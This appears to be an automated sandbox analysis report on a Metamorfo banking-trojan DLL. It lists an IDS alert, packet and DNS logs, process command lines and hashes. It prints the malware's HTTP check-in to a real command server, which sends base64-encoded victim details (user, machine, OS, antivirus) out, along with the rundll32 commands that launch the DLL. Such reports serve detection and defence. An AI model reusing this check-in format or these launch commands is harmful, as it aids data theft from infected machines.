                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2025-01-15T20:38:03.630224+01002833187ETPRO MALWARE Win32/Metamorfo CnC Checkin1192.168.2.64985215.228.77.17880TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 15, 2025 20:37:42.258096933 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:37:42.263139963 CET804985215.228.77.178192.168.2.6
                              Jan 15, 2025 20:37:42.263225079 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:37:42.263437033 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:37:42.268265009 CET804985215.228.77.178192.168.2.6
                              Jan 15, 2025 20:37:42.268651009 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:37:42.273521900 CET804985215.228.77.178192.168.2.6
                              Jan 15, 2025 20:37:43.858330965 CET5817953192.168.2.6162.159.36.2
                              Jan 15, 2025 20:37:43.863193035 CET5358179162.159.36.2192.168.2.6
                              Jan 15, 2025 20:37:43.863353968 CET5817953192.168.2.6162.159.36.2
                              Jan 15, 2025 20:37:43.887554884 CET5358179162.159.36.2192.168.2.6
                              Jan 15, 2025 20:37:44.408051014 CET5817953192.168.2.6162.159.36.2
                              Jan 15, 2025 20:37:44.413137913 CET5358179162.159.36.2192.168.2.6
                              Jan 15, 2025 20:37:44.413191080 CET5817953192.168.2.6162.159.36.2
                              Jan 15, 2025 20:38:03.630119085 CET804985215.228.77.178192.168.2.6
                              Jan 15, 2025 20:38:03.630223989 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:38:03.630362034 CET4985280192.168.2.615.228.77.178
                              Jan 15, 2025 20:38:03.635848999 CET804985215.228.77.178192.168.2.6

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jan 15, 2025 20:37:43.847042084 CET5349852162.159.36.2192.168.2.6
                              Jan 15, 2025 20:37:44.420780897 CET4969853192.168.2.61.1.1.1
                              Jan 15, 2025 20:37:44.439356089 CET53496981.1.1.1192.168.2.6

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 15, 2025 20:37:44.420780897 CET192.168.2.61.1.1.10xdc11Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 15, 2025 20:37:44.439356089 CET1.1.1.1192.168.2.60xdc11Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • 15.228.77.178

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.64985215.228.77.178801804C:\Windows\SysWOW64\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jan 15, 2025 20:37:42.263437033 CET271OUTPOST /ytr/serv.php HTTP/1.0
                              Connection: keep-alive
                              Content-Type: application/x-www-form-urlencoded
                              Content-Length: 145
                              Host: 15.228.77.178
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
                              Jan 15, 2025 20:37:42.268651009 CET145OUTData Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 5a 57 35 6e 61 57 35 6c 5a 58 49 26 63 6e 61 6d 65 3d 4e 6a 4d 79 4f 54 49 79 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48
                              Data Ascii: vv=10&vw=&mods=&uname=ZW5naW5lZXI&cname=NjMyOTIy&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll"
                              Imagebase:0xe00000
                              File size:126'464 bytes
                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:14:37:00
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:14:37:03
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:7
                              Start time:14:37:06
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:14:37:23
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:14:37:43
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:16
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:17
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              General

                              Target ID:18
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              General

                              Target ID:19
                              Start time:14:37:49
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Has exited:true

                              General

                              Target ID:21
                              Start time:14:38:07
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:14:38:12
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:14:38:13
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:26
                              Start time:14:38:15
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436
                              Imagebase:0x1000000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:14:38:21
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                              Imagebase:0xc50000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:14:38:23
                              Start date:15/01/2025
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768
                              Imagebase:0x7ff726190000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              No disassembly